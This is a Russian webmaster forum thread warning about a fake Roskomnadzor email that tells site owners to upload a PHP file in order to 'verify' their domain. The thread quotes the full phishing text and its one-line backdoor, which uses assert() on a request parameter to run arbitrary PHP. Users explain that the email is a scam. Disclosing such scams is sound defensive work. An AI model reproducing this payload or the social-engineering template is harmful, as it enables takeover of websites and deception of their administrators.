ОСТОРОЖНО - РАЗВОД! Письмо от "РОСКОМНАДЗОРА"!
Страницы: 1 2 След.
ОСТОРОЖНО - РАЗВОД! Письмо от "РОСКОМНАДЗОРА"!, мошенники
Несколько минут назад получаю такое письмо: Уведомление о внесении сайта staiki.net в реестр организаторов распространения информации в сети «Интернет»

Рисунок


Решил пройтись по сео-форумам, чтобы уточнить и не ограничить наших пользователей форума с России. И на первом же сеошном форуме картина прояснилась - это РАЗВОД.

Как видно с сообщения стоит галочка что цифровая подпись ок, на самом деле при нажатии подробностей, оно отправлено с

Код: Выделить всё
Письмо отправлено с домена sendgrid.me


Вот так и начинается развод, аккуратнее. Код, который просят поставить на сайт является бекдором, заливать или создавать на сайте категорически не рекомендую. Если вы все таки установили - чистки сайта от вредоносных скриптов не избежать!
Изменено: staiki Net - 27 Августа 2015 01:55
http://staiki.net/index.php? -Форум Компьютерная Помощь
Пояснение для тех кто ведется или не ведется на эту хрень!

Получив такое письмо от якобы Роскомнадзора, можно не искать инфу, потому что:

1. Роскомнадзор не ведет переписок с админами, владельцами сайтов или хостерами, и не направляет им какие-либо подобные уведомления.
2. Роскомнадзор не просит вставить какой-либо любой код или подтвердить что вы владелец. Потвердить что вы владелец сайта Роскомназор попросит или не попросит вашего хостера. Потому как им пофиг кто именно владелец, если решать закрыть доступ к вашему сайту, им будет пофиг кто владелец, и подтвердите ли вы это как-то или нет. То есть:

1. РКН напишет письмо хостеру о том, что вы должны удалить что-то со своего сайта. Или попросит хостера заблокировать ваш сайт целиком - например если вы торгуете через сайт наркотиками.
2. В случае, если хостер тупит, молчит или изображает невменяемость - РКН закрывает сайт через суд, или если нет такой возможности, например сайт иностранцу принадлежит, и хостер иностранный, то блокируется ваш сайт в России на уровне провайдеров.


Проще говоря, получив телегу с просьбой что-подтвердить тем более заливая файл или встраивая код - ваш выход: забейте! Если РКНу понадобится, то вам напишет\позвонит ваш хостер тем способом связи, который вы указали при реге на хостинге.
Изменено: sharkson - 27 Августа 2015 02:52
Цитата
sharkson пишет:
Проще говоря, получив телегу с просьбой что-подтвердить тем более заливая файл или встраивая код - ваш выход: забейте! Если РКНу понадобится, то вам напишет\позвонит ваш хостер тем способом связи, который вы указали при реге на хостинге.
Многие этого не знают. Потому и нужно народ предупредить. Я сам чуть было не поставил этот код. Благо есть люди,которые сразу об этом пишут в сети.
Цитата
staiki Net пишет:
об этом пишут в сети.
Правильно - гуглить. Советую сменить мыло, которое вы указали на хостинге, и более его нигде не светить и никому не сообщать.

Или вам письмо пришло по контактам на сайте?
Цитата
sharkson пишет:
Или вам письмо пришло по контактам на сайте?
Ну да. Скрин в первом сообщении это моё письмо. Откуда взяли мыло - я .хз.. Но судя по информации с многих форумов, что очень многие админы своих площадок получили подобное письмо. С этого следует вопрос - откуда мошенники взяли базу сайтов с мэйлами их админов?

Цитата
sharkson пишет:
Советую сменить мыло, которое вы указали на хостинге, и более его нигде не светить и никому не сообщать.
Сделано ещё неделю назад. Я сменил регистратора REG.RU из-за д*бильной ихней политики а так же мыло. Так что мыло новое на whois нет. База рассылок по-ходу старая..
staiki Net,  да помимо скрытия в вхуиз лучше его нигде не светить: типа реги на форумах и пр. Только для хостинга.
А что делает тот код, который просят разместить?
@CBrobot - бот в Telegram для покупки биткоинов.
Хитрый развод, уверен что люди ведутся.
the_Underdog, код который просят разместить выполняет любой PHP код на сайте, переданный злоумышленником в HTTP запросе.
Цитата
О. Н. пишет:
Хитрый развод, уверен что люди ведутся.
Сегодня хостер мой Бегет прислал предупреждения по таким письмам - значит проблема существует.
Цитата
sharkson пишет:
Роскомнадзор не просит вставить какой-либо любой код или подтвердить что вы владелец.
Немного дополню: НИКТО не просит вставить код PHP вообще ни при каких обстоятельствах. И запомните эти два академических названия функции и глобальной переменной: assert и REQUEST - это академический способ получения доступа к сайту через фишинг. Увидели - в СПАМ. Увидели на своём сайте - срочно убрать!
Изменено: Дивергент - 27 Августа 2015 18:16
Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.
Цитата
Академик пишет:
Сегодня хостер мой Бегет прислал предупреждения по таким письмам - значит проблема существует.
То же самое - прислали.

Надо потом сюда текст фишингового письма запостить для индексации.
Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени site.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт www.site.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени www.site.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени www.site.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.site.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.site.ru, следую инструкции указанной выше, то Ваш сайт www.site.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
Почта: zapret-info@roskomnadzor.org
Фигово нам (юридические фирмы) такие письма не присылают, я бы в ФСБ направил и раздул шумиху с РКН =) После слов  и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015 уже и суд поднапрячь можно было!
Цитата
sharkson пишет:
1. Роскомнадзор не ведет переписок с админами, владельцами сайтов или хостерами, и не направляет им какие-либо подобные уведомления.
Цитата
sharkson пишет:
1. РКН напишет письмо хостеру о том, что вы должны удалить что-то со своего сайта. Или попросит хостера заблокировать ваш сайт целиком - например если вы торгуете через сайт наркотиками.
Не верно. Роскомнадзор может обращаться напрямую к администратору сайта, если на сайте в привычном месте имеются контакты для связи.Это письмо от мошенников я получал тоже. Проигнорировал и отправил в Роскомнадзор копию, для анализа. Настоящее письмо от настоящего Роскомнадзора тоже получал ранее, по другому вопросу. До хостера дело дойдет, если админ не указывает способ связи с ним или не реагирует на обращения.
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
18:09 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:06 Влияние ссылок буржнете 
10:53 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
08:36 Обновления интерфейса яндекс метрики 
15:13 Рапида умерла. Куда выводить с AdSense? 
15:05 Чем заменили ТИЦ? 
15:01 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
10:21 [eBucks] Автоматический обмен криптовалют. BTC и любые альткоины. Киви, Банковские карты и др. электронные системы. 
22:15 Криптовалютный обменник Xgram.io - новое воплощение качества 
15:49 Проверка на индекс в Telegram боте @SpeedyIndexbot 
13:47 HidMark.com - естественные ссылки от 1.5$ Естественные ссылки. Крауд-маркетинг. 
12:05 USMobileSMSBot - 
11:16 4G/LTE Mobile Proxy 30+ geo  
15:34 «Взрываем языковые преграды» – переводим любые тексты 
22:48 150+ хакерских поисковых систем и инструментов 
22:43 Точные прогнозы на футбол 
19:49 Текст.ру преподнёс "подарок" 
18:12 Подтягиваем физкультурку 
13:45 В России снизили беспошлинный порог для онлайн-покупок 
13:30 Тренды заработка 2024-2025 
13:12 Суд постановил заблокировать Telegram